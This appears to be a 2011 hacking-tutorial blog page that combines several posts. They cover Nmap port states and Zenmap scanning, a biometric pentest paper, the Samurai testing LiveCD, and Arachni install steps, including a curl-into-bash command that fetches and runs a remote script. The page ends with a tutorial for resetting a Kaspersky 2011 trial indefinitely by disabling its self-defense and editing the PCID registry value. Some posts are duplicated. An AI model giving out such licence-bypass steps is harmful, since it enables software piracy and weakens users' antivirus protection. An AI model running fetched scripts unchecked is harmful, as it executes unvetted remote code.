NMAP(Network Mapper) is one of the most basic & advanced fingerprinting tool.I totally recommend this tool to everyone.


Basically NMAP is port scanner with advanced features like host identification topology etc
The six port states recognized by Nmap
OPEN
An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network.
CLOSED
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.    
FILTERED 
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.
 
UNFILTERED 
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
 
open|filtered
Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
 
closed|filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
here are the two videos showing basics of nmap








For those who have low bandwith nd cant go through videos
 Here i used Zenmap(nmap GUI) to scan my windows machine on vmware i used intensive scan with all 65535 ports to scan
 Results were really cool showing all my open ports + os detection was accurate

you can download nmap from here 

do share your views for this tut

Saturday, March 5, 2011

Hacking A Biometric System



Description: This paper was presented in NullCOn 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

Hacking A Biometric System



Description: This paper was presented in NullCOn 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

SAMURAI Web Testing Framework



Samurai is a LiveCD focused on web application testing. It comes with the top testing tools and pre-installed them to build the perfect environment for testing applications.



There are many people who are much interested into web sphere hacking this linux is especially designed for them



I had some problems with installing it on vmware but it was smooth on installing on HD :)


you can download samurai linux here

SAMURAI Web Testing Framework



A LiveCD focused on web application testing. It comes with the top testing tools and pre-installed them to build the perfect environment for testing applications.



There are many people who are much intrested into web sphere hacking this linux is especially desinged for them



I had some problems with installing it on vmware but it was smooth on installing on HD :)


you can download samurai linux here

Install Arachni v0.2.2.2 - GnackTrack R6

### Installation Arachni v0.2.2.2 - GnackTrack R6

$ sudo apt-get install phpmyadmin

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev

$ bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )


wget ftp://ftp.ruby-lang.org//pub/ruby/1.9/ruby-1.9.2-p180.tar.gz

tar -zxvf ruby-1.9.2-p180.tar.gz

cd ruby-1.9.2-p180

./configure
make
make install

-----
http://localhost/phpmyadmin

MySQL connection collation:binary


https://github.com/zapotek/arachni

download : Zapotek-arachni-v0.2.2.1-41-ge72062e.tar.gz

tar -zxvf Zapotek-arachni-v0.2.2.1-41-ge72062e.tar.gz

cd Zapotek-arachni-v0.2.2.1-41-ge72062e.tar.gz

rake install

-----
arachni_web_autostart




KASPERSKY-2011 LICENSE FOREVER

After this tut you will be able to use your KASPERSKY-2011 forever!

1st Download kaspersky trial version


now Go to Setting, then select Option, Uncheck the "Enable Self Defense" and click OK


Now right-click the kaspersky icon from taskbar and click on "Exit".


goto run and type in "regedit".

Now goto HKEY_LOCAL_MACHINE ---->SOFTWARE ---->KASPERSKYLAB ---->PROTECTED ---->AVP11 ---->ENVIRONMENT

Now in the right hand side you can see PCID. Double click it and change the last two values before the flower bracket and click ok.eg:- The last two values are "D7"... So change it to "F9"



ow open kaspersky again and Select "Activate Trial License" and click next.


Now enable Self-Defence and KASPERSKY-2011 LICENSE FOREVER

AFTER ONE MONTH REPEAT THE SAME PROCESS AGAIN..:)